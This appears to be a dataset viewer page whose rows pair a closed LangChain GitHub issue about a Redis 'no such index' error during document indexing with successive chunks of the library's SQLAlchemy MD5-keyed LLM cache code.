This line makes impossible to save in the wanted format, and there's another thing: The index is not created for some reason.
I'll try to fix, but I'm not sure if it's possible for me at the moment, so I'm reporting this, I hope it helps.
### Expected behavior
Expected behavior inside Redis: "docs:indexname_:12ss2sadd" | https://github.com/langchain-ai/langchain/issues/11197 | https://github.com/langchain-ai/langchain/pull/11257 | 079d1f3b8e8cf7a4aaa60009fe4402169cd62d8a | d5c2ce7c2e1179907400f2c96fc6309a54cbce6a | "2023-09-28T19:57:36Z" | python | "2023-10-24T17:51:25Z" | libs/langchain/langchain/cache.py | """SQLite table for full LLM Cache (all generations)."""
__tablename__ = "full_md5_llm_cache"
id = Column(String, primary_key=True)
prompt_md5 = Column(String, index=True)
llm = Column(String, index=True)
idx = Column(Integer, index=True)
prompt = Column(String)
response = Column(String)
class SQLAlchemyMd5Cache(BaseCache):
"""Cache that uses SQAlchemy as a backend."""
def __init__(
self, engine: Engine, cache_schema: Type[FullMd5LLMCache] = FullMd5LLMCache
):
"""Initialize by creating all tables."""
self.engine = engine
self.cache_schema = cache_schema
self.cache_schema.metadata.create_all(self.engine)
def lookup(self, prompt: str, llm_string: str) -> Optional[RETURN_VAL_TYPE]: |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 11,197 | Documents not being correctly indexed in vector database. ["redis.exceptions.ResponseError: my_docs: no such index"] | ### System Info
Following the steps of indexing from [ https://python.langchain.com/docs/modules/data_connection/indexing ](url) you'll find the following error "redis.exceptions.ResponseError: my_docs: no such index".
You'll get this exception while using redis as retriever:

### Who can help?
_No response_
### Information
- [x] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [X] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction

The error is here:

If you look for the index you'll get (empty list or set).
This line makes impossible to save in the wanted format, and there's another thing: The index is not created for some reason.
I'll try to fix, but I'm not sure if it's possible for me at the moment, so I'm reporting this, I hope it helps.
### Expected behavior
Expected behavior inside Redis: "docs:indexname_:12ss2sadd" | https://github.com/langchain-ai/langchain/issues/11197 | https://github.com/langchain-ai/langchain/pull/11257 | 079d1f3b8e8cf7a4aaa60009fe4402169cd62d8a | d5c2ce7c2e1179907400f2c96fc6309a54cbce6a | "2023-09-28T19:57:36Z" | python | "2023-10-24T17:51:25Z" | libs/langchain/langchain/cache.py | """Look up based on prompt and llm_string."""
rows = self._search_rows(prompt, llm_string)
if rows:
return [loads(row[0]) for row in rows]
return None
def update(self, prompt: str, llm_string: str, return_val: RETURN_VAL_TYPE) -> None:
"""Update based on prompt and llm_string."""
self._delete_previous(prompt, llm_string)
prompt_md5 = self.get_md5(prompt)
items = [
self.cache_schema(
id=str(uuid.uuid1()),
prompt=prompt,
prompt_md5=prompt_md5,
llm=llm_string,
response=dumps(gen),
idx=i,
)
for i, gen in enumerate(return_val)
]
with Session(self.engine) as session, session.begin():
for item in items:
session.merge(item)
def _delete_previous(self, prompt: str, llm_string: str) -> None: |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 11,197 | Documents not being correctly indexed in vector database. ["redis.exceptions.ResponseError: my_docs: no such index"] | ### System Info
Following the steps of indexing from [ https://python.langchain.com/docs/modules/data_connection/indexing ](url) you'll find the following error "redis.exceptions.ResponseError: my_docs: no such index".
You'll get this exception while using redis as retriever:

### Who can help?
_No response_
### Information
- [x] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [X] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction

The error is here:

If you look for the index you'll get (empty list or set).
This line makes impossible to save in the wanted format, and there's another thing: The index is not created for some reason.
I'll try to fix, but I'm not sure if it's possible for me at the moment, so I'm reporting this, I hope it helps.
### Expected behavior
Expected behavior inside Redis: "docs:indexname_:12ss2sadd" | https://github.com/langchain-ai/langchain/issues/11197 | https://github.com/langchain-ai/langchain/pull/11257 | 079d1f3b8e8cf7a4aaa60009fe4402169cd62d8a | d5c2ce7c2e1179907400f2c96fc6309a54cbce6a | "2023-09-28T19:57:36Z" | python | "2023-10-24T17:51:25Z" | libs/langchain/langchain/cache.py | stmt = (
select(self.cache_schema.response)
.where(self.cache_schema.prompt_md5 == self.get_md5(prompt))
.where(self.cache_schema.llm == llm_string)
.where(self.cache_schema.prompt == prompt)
.order_by(self.cache_schema.idx)
)
with Session(self.engine) as session, session.begin():
rows = session.execute(stmt).fetchall()
for item in rows:
session.delete(item)
def _search_rows(self, prompt: str, llm_string: str) -> List[Row]:
prompt_pd5 = self.get_md5(prompt)
stmt = (
select(self.cache_schema.response)
.where(self.cache_schema.prompt_md5 == prompt_pd5)
.where(self.cache_schema.llm == llm_string)
.where(self.cache_schema.prompt == prompt)
.order_by(self.cache_schema.idx)
)
with Session(self.engine) as session:
return session.execute(stmt).fetchall()
def clear(self, **kwargs: Any) -> None:
"""Clear cache."""
with Session(self.engine) as session:
session.execute(self.cache_schema.delete())
@staticmethod
def get_md5(input_string: str) -> str:
return hashlib.md5(input_string.encode()).hexdigest() |
Subsets and Splits
No saved queries yet
Save your SQL queries to embed, download, and access them later. Queries will appear here once saved.